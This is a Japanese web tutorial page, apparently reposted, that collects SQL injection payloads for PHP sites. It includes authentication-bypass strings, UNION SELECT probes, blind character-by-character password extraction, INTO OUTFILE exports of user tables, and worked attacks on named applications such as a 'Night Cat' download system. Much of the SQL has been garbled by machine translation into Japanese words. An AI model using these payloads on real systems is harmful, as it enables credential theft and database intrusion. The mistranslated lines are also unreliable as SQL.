ホームページ  >  記事  >  バックエンド開発  >  高度な PHP インジェクション方法集 ページ 1/2_PHP チュートリアル

高度な PHP インジェクション方法集 ページ 1/2_PHP チュートリアル

WBOY
WBOYオリジナル
2016-07-21 15:51:031035ブラウズ

'%23

' および passWord='mypass

id=-1 Union select 1,1,1

id=-1 Union select char(97),char(97),char(97)

id= 1 組合はメンバーから 1,1,1 を選択します

id=1 組合は管理者から 1,1,1 を選択します

id=1 組合はユーザー

userid=1 およびパスワード =mypass

userid から 1,1,1 を選択します=1 およびmid(パスワード,3,1)=char(112)

userid=1 およびmid(パスワード,4,1)=char(97)

および ord(mid(パスワード,3,1))> ;111 (ord 関数は非常に便利で、整数を返すことができます)

' および LENGTH(password)='6 (パスワードの長さを検出)

' および LEFT(password,1)='m

' および LEFT(パスワード ,2)='my

…………………………………………など

' Union select 1,username,password from user/*

' Union select 1,username ,password from user/*

=' Union select 1,username,password from user/* (1 または直接 = を指定できます)

99999' Union select 1,username,password from user/*

' into outfile 'c:/file.txt (エクスポートファイル)

=' または 1=1 into outfile 'c:/file.txt

1' Union select 1,username,password from user into outfile 'c:/user. txt

管理者からパスワードを選択します wherelogin='John' INTO DUMPFILE '/path/to/site/file.txt'

id=' Union select 1,username,password from user into outfile

id=-1 Union select 1,database(),version () (柔軟なアプリケーション クエリ)

一般的に使用されるクエリ テスト ステートメント、

select * FROM table where 1=1

select * FROM table where 'uuu'='uuu'

select * 1<>2

select の FROM テーブル * 3>2

select の FROM テーブル * 2
select の FROM テーブル * 1

select の FROM テーブル * 1+1

select の FROM テーブル* 1--1 の FROM テーブル

select * ISNULL(NULL) の FROM テーブル

select * ISNULL(COT(0)) の FROM テーブル

select * 1 IS NOT NULL の FROM テーブル

select * FROM テーブルwhere NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where 'b' BETWEEN 'a' AND 'c'

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例: Night Cat ダウンロード システム バージョン 1.0

id=1 Union select 1,1,1,1,1,1,1,1,1 ,1,1,1,1,1 ,1,1,1,1,1

ユニオン選択 1,1,1,1,1,1,1,1,1,1,1,1,1, ymdown_user から 1,1,1,1,1, 1

ユニオン選択 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1 from ymdown_user where id=1

id=10000 Union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1 ymdown_user (id=1 および groupid=1)

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1 from ymdown_user where id= 1 (置換、パスワード検索)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (最初のパスワードを確認します)

union select 1,1,1,1,1,1, 1,1,1,1,1 ,1,1,1,1,1,1,1,1 (id=1 および ord(mid(password,2,1))=50 (2 番目の位置) の ymdown_user から)

union select 1,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid (パスワード,3,1)) =51

………………………………………………………… 

例例2:灰色轨迹 变换id进行测试(流星)

union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where% 20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid %20=%2010)%20order%20by%20eventdate

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/319191.html技術記事 '%23 'andpassWord='mypass id=-1unionselect1,1,1 id=-1unionselectchar(97),char(97),char(97) id=1unionselect1,1,1frommembers id=1unionselect1,1,1fromadmin id=1unionselect1 ,1,1ユーザーから...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。